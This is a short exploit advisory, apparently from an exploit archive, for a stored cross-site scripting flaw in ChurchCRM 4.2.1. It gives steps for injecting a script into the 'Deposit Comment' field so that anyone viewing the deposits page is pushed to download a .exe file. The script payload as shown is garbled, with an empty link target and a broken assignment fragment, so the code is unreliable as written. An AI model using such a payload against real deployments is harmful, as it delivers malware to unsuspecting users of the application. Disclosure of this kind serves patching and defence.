#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)  
#Date: 2020- 10- 29  
#Exploit Author: Mufaddal Masalawala  
#Vendor Homepage:  
#Software Link:  
#Version: 4.2.1  
#Tested on: Kali Linux 2020.3  
#Proof Of Concept:  
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:  
1. Login to the application, go to 'View all Deposits' module.  
2. Add the payload ( <script>var link = document.createElement('a');  
link.href = ''; = ''; document.body.appendChild(link);;  
) in the 'Deposit Comment' field and click "Add New Deposit".  
3. Payload is executed and a .exe file is downloaded.